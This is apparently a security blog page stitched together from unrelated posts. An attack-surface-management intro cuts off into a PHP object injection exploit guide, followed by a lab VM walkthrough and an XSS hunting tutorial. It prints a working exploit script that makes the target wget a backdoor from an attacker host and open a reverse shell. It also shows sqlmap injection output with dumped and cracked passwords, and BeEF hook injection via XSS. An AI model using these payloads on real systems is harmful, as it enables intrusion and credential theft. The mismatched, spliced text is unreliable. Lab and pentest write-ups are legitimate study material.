Continuous Attack Surface Management (ASM) and reduction has become a crucial function for every organization to gain visibility of their perimeter security. Having the right tools and processes in place is vital to detecting new vulnerabilities before attackers do. In this blog post, we will outline the basic steps for discovering the attack surface with Sn1per Professional v9.0.
The first step in the exploitation process is to detect the presence of PHP serialization in the application we are testing. To assist, we can use SuperSerial for Burpsuite which can be downloaded here: https://www.directdefense.com/superserial-java-deserialization-burp-extension/ (see below). This will passively detect the presence of PHP and Java serialization in the application we’re testing.
Analyze
Now that we’ve detected PHP serialization in the application, we can confirm if remote code execution is possible by analyzing the source code for the application (if available…). As seen below, the important thing to note is that serialized objects are taken from the “r” parameter ($var1=unserialize($_REQUEST[‘r’]);) and unserialized and eval’ed (eval($this->inject);), then displayed via (echo “< br/>”.$var1[0].” – “.$var1[1];). Given this, code execution appears to be possible if we pass PHP serialized objects to the “r” parameter! 🙂
< ?php
error_reporting(E_ALL);
class PHPObjectInjection{
public $inject;
function __construct(){
}
function __wakeup(){
if(isset($this->inject)){
eval($this->inject);
}
}
}
//?r=a:2:{i:0;s:4:"XVWA";i:1;s:33:"Xtreme Vulnerable Web Application";}
if(isset($_REQUEST['r'])){
$var1=unserialize($_REQUEST['r']);
if(is_array($var1)){
echo "
".$var1[0]." - ".$var1[1];
}
}else{
echo "parameter is missing";
}
? >
Exploit
To exploit this flaw, we can create a simple PHP script to generate our PHP serialized payload automatically and run whatever commands we want on the remote host. In this case, I chose to create a versatile reverse shell via PHP using this script (http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz). NOTE: You will need to host this file on your web server and update the local IP and port in the reverse shell script as well as update the below exploit code to point to your server…
< ?php
/*
PHP Object Injection PoC Exploit by 1N3 @CrowdShield - https://xerosecurity.com
A simple PoC to exploit PHP Object Injections flaws and gain remote shell access.
Shouts to @jstnkndy @yappare for the assist!
NOTE: This requires http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz setup on a remote host with a connect back IP configured
*/
print "==============================================================================\r\n";
print "PHP Object Injection PoC Exploit by 1N3 @CrowdShield - https://xerosecurity.com\r\n";
print "==============================================================================\r\n";
print "[+] Generating serialized payload...[OK]\r\n";
print "[+] Launching reverse listener...[OK]\r\n";
system('gnome-terminal -x sh -c \'nc -lvvp 1234\'');
class PHPObjectInjection
{
// CHANGE URL/FILENAME TO MATCH YOUR SETUP
public $inject = "system('wget http://yourhost/phpobjbackdoor.txt -O phpobjbackdoor.php && php phpobjbackdoor.php');";
}
$url = 'http://targeturl/xvwa/vulnerabilities/php_object_injection/?r='; // CHANGE TO TARGET URL/PARAMETER
$url = $url . urlencode(serialize(new PHPObjectInjection));
print "[+] Sending exploit...[OK]\r\n";
print "[+] Dropping down to interactive shell...[OK]\r\n";
print "==============================================================================\r\n";
$response = file_get_contents("$url");
? >
Demo
Now that our exploit is ready, we can execute it to get a nice reverse shell on the remote host for full remote command execution! Shout to @jstnkndy @yappare for the assist! -1N3
# netdiscover -r 192.168.1.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
5 Captured ARP Req/Rep packets, from 5 hosts. Total size: 282
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor
-----------------------------------------------------------------------------
192.168.1.101 00:0c:29:8c:bd:7b 01 042 VMware, Inc.
ENUMERATION
____
_________ / _/___ ___ _____
/ ___/ __ \ / // __ \/ _ \/ ___/
(__ ) / / // // /_/ / __/ /
/____/_/ /_/___/ .___/\___/_/
/_/
+ -- --=[http://xerosecurity.com
+ -- --=[sn1per v1.6 by 1N3
################################### Running recon #################################
Server: 206.248.154.22
Address: 206.248.154.22#53
** server can't find 101.1.168.192.in-addr.arpa: NXDOMAIN
Host 101.1.168.192.in-addr.arpa. not found: 3(NXDOMAIN)
################################### Pinging host ###################################
PING 192.168.1.101 (192.168.1.101) 56(84) bytes of data.
--- 192.168.1.101 ping statistics ---
1 packets transmitted, 0 received, 100% packet loss, time 0ms
################################### Running port scan ##############################
Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-15 16:00 EST
Nmap scan report for 192.168.1.101
Host is up (0.00026s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 3c:3d:e3:8e:35:f9:da:74:20:ef:aa:49:4a:1d:ed:dd (DSA)
| 2048 85:94:6c:87:c9:a8:35:0f:2c:db:bb:c1:3f:2a:50:c1 (RSA)
|_ 256 f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37 (ECDSA)
MAC Address: 00:0C:29:8C:BD:7B (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 3.19, Linux 3.2 - 4.0
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.25 ms 192.168.1.101
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.69 seconds
Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-15 16:02 EST
Nmap scan report for 192.168.1.101
Host is up (0.00025s latency).
PORT STATE SERVICE VERSION
53/udp open|filtered domain
67/udp open|filtered dhcps
68/udp open|filtered dhcpc
88/udp open|filtered kerberos-sec
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
139/udp open|filtered netbios-ssn
161/udp open|filtered snmp
| snmp-hh3c-logins:
|_ baseoid: 1.3.6.1.4.1.25506.2.12.1.1.1
162/udp open|filtered snmptrap
389/udp open|filtered ldap
520/udp open|filtered route
2049/udp open|filtered nfs
MAC Address: 00:0C:29:8C:BD:7B (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.25 ms 192.168.1.101
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 124.99 seconds
SSH BANNER
Since our only open port was SSH, I decided to ssh and see what options or hints were available…
As the SSH banner hints at, it seems that we would need to use port knocking in order to unlock any other hidden services running on the target.
[email protected]:/pentest/loot# knock 192.168.1.101 1 2 3
[email protected]:/pentest/loot# sniper 192.168.1.101
[3;J
____
_________ / _/___ ___ _____
/ ___/ __ \ / // __ \/ _ \/ ___/
(__ ) / / // // /_/ / __/ /
/____/_/ /_/___/ .___/\___/_/
/_/
+ -- --=[http://xerosecurity.com
+ -- --=[sn1per v1.6 by 1N3
################################### Running recon #################################
Server: 206.248.154.22
Address: 206.248.154.22#53
** server can't find 101.1.168.192.in-addr.arpa: NXDOMAIN
Host 101.1.168.192.in-addr.arpa. not found: 3(NXDOMAIN)
################################### Pinging host ###################################
PING 192.168.1.101 (192.168.1.101) 56(84) bytes of data.
--- 192.168.1.101 ping statistics ---
1 packets transmitted, 0 received, 100% packet loss, time 0ms
################################### Running port scan ##############################
Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-15 16:16 EST
Nmap scan report for 192.168.1.101
Host is up (0.00022s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 3c:3d:e3:8e:35:f9:da:74:20:ef:aa:49:4a:1d:ed:dd (DSA)
| 2048 85:94:6c:87:c9:a8:35:0f:2c:db:bb:c1:3f:2a:50:c1 (RSA)
|_ 256 f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37 (ECDSA)
1337/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:8C:BD:7B (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 3.19, Linux 3.2 - 4.0
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.22 ms 192.168.1.101
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 101.71 seconds
Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-15 16:18 EST
Nmap scan report for 192.168.1.101
Host is up (0.00020s latency).
PORT STATE SERVICE VERSION
53/udp open|filtered domain
67/udp open|filtered dhcps
68/udp open|filtered dhcpc
88/udp open|filtered kerberos-sec
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
139/udp open|filtered netbios-ssn
161/udp open|filtered snmp
| snmp-hh3c-logins:
|_ baseoid: 1.3.6.1.4.1.25506.2.12.1.1.1
162/udp open|filtered snmptrap
389/udp open|filtered ldap
520/udp open|filtered route
2049/udp open|filtered nfs
MAC Address: 00:0C:29:8C:BD:7B (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.20 ms 192.168.1.101
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 122.93 seconds
INTERESTING RESPONSE
Now that we have an open Apache server listening on 1337/tcp, I quickly discovered an interesting response in the 404 pages..
It seemed strange to have an encoded message in the HTML comments of the 404 page so I knew this was a hint and could likely be decoded. Sure enough, it appeared to be a double-encoded base64 string.
Now that we decoded a message that seems to be reveal a hidden login page, the next obvious step was to either try some form of SQLi or auth bypass or brute force method to get further…
POST /978345210/index.php HTTP/1.1
Host: 192.168.1.101:1337
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.101:1337/978345210/index.php
Cookie: PHPSESSID=u3gjjtco6dqnq2c5peo530hbj3; BEEFHOOK=Ltt1x7RzZyuW6VnfdQu8dTM0zmXPpxe8Fgk6KjqhgU9KZzL4DptDN2KiVOyNsPTeiryahKYGwjIYTbbX
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
username=user&password=pass&submit=+Login+
HTTP/1.1 200 OK
Date: Fri, 15 Jan 2016 23:37:34 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 516
Connection: close
Content-Type: text/html
< !DOCTYPE html>
< html>
< head>
< title>LOTR Login!< /title>
< /head>
< body>
< div id="main">
< h1>Welcome to the Gates of Mordor< /h1>
< div id="login">
< form action="" method="post">
< label>User :< /label>
< input id="name" name="username" placeholder="username" type="text">< br>
< label>Password :< /label>
< input id="password" name="password" placeholder="**********" type="password">
< br>
< input name="submit" type="submit" value=" Login ">
< span>Username or Password is invalid< /span>
< /form>
< /div>
< /div>
< /body>
< /html>
SQL INJECTION VULNERABILITY
Scanning with Burpsuite quickly revealed that the login for was vulnerable to SQL injection.
SQL INJECTION EXPLOITATION
Using SQLMap, we can dig into the DB and see what else we can find.
[email protected]:~# sqlmap -u 'http://192.168.1.101:1337/978345210/index.php' --data='username=user&password=pass&submit=+Login+' --cookie='PHPSESSID=u3gjjtco6dqnq2c5peo530hbj3; BEEFHOOK=Ltt1x7RzZyuW6VnfdQu8dTM0zmXPpxe8Fgk6KjqhgU9KZzL4DptDN2KiVOyNsPTeiryahKYGwjIYTbbX' --level=5 --risk=3
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-201601080a89}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 19:09:48
[19:09:48] [INFO] testing connection to the target URL
[19:09:48] [INFO] heuristics detected web page charset 'ascii'
[19:09:48] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[19:09:48] [INFO] testing if the target URL is stable
[19:09:49] [INFO] target URL is stable
[19:09:49] [INFO] testing if POST parameter 'username' is dynamic
[19:09:49] [WARNING] POST parameter 'username' does not appear dynamic
[19:09:49] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable
[19:09:49] [INFO] testing for SQL injection on POST parameter 'username'
[19:10:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:10:31] [INFO] POST parameter 'username' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
[19:10:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:10:35] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
sqlmap got a 302 redirect to 'http://192.168.1.101:1337/978345210/profile.php'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] y
[19:10:43] [INFO] target URL appears to be UNION injectable with 1 columns
[19:10:43] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql')
[19:10:43] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[19:10:44] [INFO] testing 'Generic UNION query (NULL) - 22 to 40 columns'
[19:10:45] [INFO] testing 'Generic UNION query (random number) - 22 to 40 columns'
[19:10:46] [INFO] testing 'Generic UNION query (NULL) - 42 to 60 columns'
[19:10:47] [INFO] testing 'Generic UNION query (random number) - 42 to 60 columns'
[19:10:48] [INFO] testing 'Generic UNION query (NULL) - 62 to 80 columns'
[19:10:49] [INFO] testing 'Generic UNION query (random number) - 62 to 80 columns'
[19:10:50] [INFO] testing 'Generic UNION query (NULL) - 82 to 100 columns'
[19:10:52] [INFO] testing 'Generic UNION query (random number) - 82 to 100 columns'
[19:10:53] [INFO] checking if the injection point on POST parameter 'username' is a false positive
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 5852 HTTP(s) requests:
---
Parameter: username (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: username=user' AND (SELECT * FROM (SELECT(SLEEP(5)))wUmu) AND 'mbXF'='mbXF&password=pass&submit= Login
---
[19:13:04] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5.0.12
[19:13:04] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.101'
[*] shutting down at 19:13:04
[email protected]:~# sqlmap -u 'http://192.168.1.101:1337/978345210/index.php' --data='username=user&password=pass&submit=+Login+' --cookie='PHPSESSID=u3gjjtco6dqnq2c5peo530hbj3; BEEFHOOK=Ltt1x7RzZyuW6VnfdQu8dTM0zmXPpxe8Fgk6KjqhgU9KZzL4DptDN2KiVOyNsPTeiryahKYGwjIYTbbX' --level=5 --risk=3 --all
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-201601080a89}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 19:14:15
[19:14:16] [INFO] resuming back-end DBMS 'mysql'
[19:14:16] [INFO] testing connection to the target URL
[19:14:16] [INFO] heuristics detected web page charset 'ascii'
sqlmap got a 302 redirect to 'http://192.168.1.101:1337/978345210/profile.php'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] y
[19:14:18] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: username=user' AND (SELECT * FROM (SELECT(SLEEP(5)))wUmu) AND 'mbXF'='mbXF&password=pass&submit= Login
---
[19:14:18] [INFO] the back-end DBMS is MySQL
[19:14:18] [INFO] fetching banner
[19:14:18] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[19:14:19] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[19:14:39] [INFO] adjusting time delay to 1 second due to good response times
5.5.44-0ubuntu0.14.04.1
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL 5.0.12
banner: '5.5.44-0ubuntu0.14.04.1'
[19:16:13] [INFO] fetching current user
[19:16:13] [INFO] retrieved: [email protected]
current user: '[email protected]'
[19:17:23] [INFO] fetching current database
[19:17:23] [INFO] retrieved: Webapp
current database: 'Webapp'
[19:17:50] [INFO] fetching server hostname
[19:17:50] [INFO] retrieved: LordOfTheRoot
hostname: 'LordOfTheRoot'
[19:18:50] [INFO] testing if current user is DBA
[19:18:50] [INFO] fetching current user
current user is DBA: True
[19:18:51] [INFO] fetching database users
[19:18:51] [INFO] fetching number of database users
[19:18:51] [INFO] retrieved: 5
[19:18:53] [INFO] retrieved: 'root'@'localhost'
[19:20:16] [INFO] retrieved: 'root'@'lordoftheroot'
[19:22:01] [INFO] retrieved: 'root'@'127.0.0.1'
[19:23:18] [INFO] retrieved: 'root'@'::1'
[19:24:10] [INFO] retrieved: 'debian-sys-maint'@'localhost'
database management system users [5]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'
[*] 'root'@'lordoftheroot'
[19:26:15] [INFO] fetching database users password hashes
[19:26:15] [INFO] fetching database users
[19:26:15] [INFO] fetching number of password hashes for user 'root'
[19:26:15] [INFO] retrieved: 1
[19:26:17] [INFO] fetching password hashes for user 'root'
[19:26:17] [INFO] retrieved: *4DD56158ACDBA81BFE3FF9D3D7375231596CE10F
[19:28:32] [INFO] fetching number of password hashes for user 'debian-sys-maint'
[19:28:32] [INFO] retrieved: 1
[19:28:33] [INFO] fetching password hashes for user 'debian-sys-maint'
[19:28:33] [INFO] retrieved: *A55A9B9049F69BC2768C9284615361DFBD580B34
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[19:31:27] [INFO] writing hashes to a temporary file '/tmp/sqlmapmR6GTw22036/sqlmaphashes-GwopYC.txt'
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] y
[19:31:32] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[19:31:34] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[19:31:38] [INFO] starting dictionary-based cracking (mysql_passwd)
[19:31:38] [INFO] starting 8 processes
[19:31:40] [INFO] cracked password 'darkshadow' for user 'root'
database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *A55A9B9049F69BC2768C9284615361DFBD580B34
[*] root [1]:
password hash: *4DD56158ACDBA81BFE3FF9D3D7375231596CE10F
clear-text password: darkshadow
[19:35:14] [INFO] fetching database users privileges
[19:35:14] [INFO] fetching database users
[21:13:23] [INFO] fetching columns for table 'Users' in database 'Webapp'
[21:13:23] [INFO] retrieved: 3
[21:13:27] [INFO] retrieved: id
[21:13:37] [INFO] retrieved: username
[21:14:14] [INFO] retrieved: password
[21:14:56] [INFO] fetching entries for table 'Users' in database 'Webapp'
[21:14:56] [INFO] fetching number of entries for table 'Users' in database 'Webapp'
[21:14:56] [INFO] retrieved: 5
[21:14:59] [INFO] retrieved: 1
[21:15:03] [INFO] retrieved: iwilltakethering
[21:16:23] [INFO] retrieved: frodo
[21:16:51] [INFO] retrieved: 2
[21:16:55] [INFO] retrieved: MyPreciousR00t
[21:18:05] [INFO] retrieved: smeagol
[21:18:39] [INFO] retrieved: 3
[21:18:44] [INFO] retrieved: AndMySword
[21:19:32] [INFO] retrieved: aragorn
[21:20:05] [INFO] retrieved: 4
[21:20:10] [INFO] retrieved: AndMyBow
[21:20:45] [INFO] retrieved: legolas
[21:21:20] [INFO] retrieved: 5
[21:21:24] [INFO] retrieved: AndMyAxe
[21:21:57] [INFO] retrieved: gimli
[21:22:20] [INFO] analyzing table dump for possible password hashes
Database: Webapp
Table: Users
[5 entries]
+----+----------+------------------+
| id | username | password |
+----+----------+------------------+
| 1 | frodo | iwilltakethering |
| 2 | smeagol | MyPreciousR00t |
| 3 | aragorn | AndMySword |
| 4 | legolas | AndMyBow |
| 5 | gimli | AndMyAxe |
+----+----------+------------------+
[21:22:20] [INFO] table 'Webapp.Users' dumped to CSV file '/root/.sqlmap/output/192.168.1.101/dump/Webapp/Users.csv'
SSH LOGIN
Now that we have lots of credentials and clear-text passwords, the next obvious route was to re-try logging in with the accounts over SSH…
Now that we have a full SSH shell to the target, the next route to root is privilege escalation. Since I had the local root password from the SQL DB and a full SSH shell, I decided the quickest way would be to use a user-defined function via the MySQL UDF exploit.
Since the MySQL daemon was running as “root” and our custom function allows us to execute commands, the quickest way to root was to either dump the /etc/shadow file and crack the root password or add the current user to the sudoers file.
In this tutorial, I will cover a simple technique to identify reflected values in a target web application and easily locate Cross-Site Scripting vulnerabilities. By injecting unique heuristic strings, we can quickly check if the value we are testing is reflected and not being sanitized by the application. I have used this technique in the past and it has helped me find various injection bugs that have paid up to $500 in some cases.
Requirements
In order to use this technique, you’ll need Burpsuite along with the custom grep strings and fuzz lists provided in this tutorial to get started. For more advanced tricks covered at the end of this tutorial, you’ll also need Apache and Beef (Browser Exploitation Framework).
Why is this helpful to me?
Using this technique allows you to do the following:
1. Find reflected values quickly (only 3 requests per injection point)
2. Find the location of all reflected values in the response
3. Confirm XSS vectors via heuristic testing
4. Exploit XSS vectors with certainty
Great! How do I do it?
1. Download the Burp attack configuration or manual payload and grep strings here
2. Load the attack configuration or manual payload lists from the Burp Intruder menu
3. Copy/paste the request to the Intruder screen and add injection points:
– Form fields
– GET/POST parameters
– Header fields
– Cookie values
– URI structure
NOTE: You’ll need to copy/paste the hostname into the “Host” tab of the Intruder configuration for this to work.
4. Run the attack and analyze the results. Is “INJECTX” reflected? If so, are HTML special characters such as <>/()”’ sanitized? If not, XSS is possible.
5. If HTML special characters are reflected in the response, proceed to XSS exploitation
Workflow:
1. Is the injection point reflected in the response? If yes, goto step 2. As seen below, the “INJECTX” string is found which confirms the payload was reflected.
2. If the payload was reflected in the response, where in the response is it reflected? Search for “INJECTX” to find all injection points. Go to step 3.
3. Once reflected injection points are found, which characters are being sanitized? Again, search for “INJECTX” in the response and look for the heuristic test characters to see which are still untampered. At a minimum, we’ll need “‘>” and “(INJECTX)” as your grep strings. If these characters or search strings are found, then XSS is possible. Proceed to step 4.
4. If XSS is possible, inject our “real” XSS payloads either through manual browser attempts, Burp Intruder or Repeater to exploit the XSS vector. In this case, I’m using an < iframe > that’s linked back to my web server.
Remote XSS Confirmation
Using a remote payload such as an < iframe > or < img >, you can get remote confirmation via Apache logs which also help keep track of blind and stored XSS vectors. This will also list the referring page the XSS loaded from along with the source IP which helps to keep track of which page and hosts are vulnerable.
Advanced XSS and Client-side Attacks via Beef
Since we control the < iframe > page, we can inject whatever HTML/JS code we want. In this case, it loads a Beef (Browser Exploitation Framework) hook.js which can be used to launch more advanced XSS/client side attacks.
Drawbacks and limitations:
– XSS vectors must be reflected in the static HTML response
– Does not work with DOM XSS injections unless additional plugins such as BurpKit are used or JS is rendered manually using other techniques
– Does not work great for blind XSS vectors
– Does not take into account XSS bypass methods if input is sanitized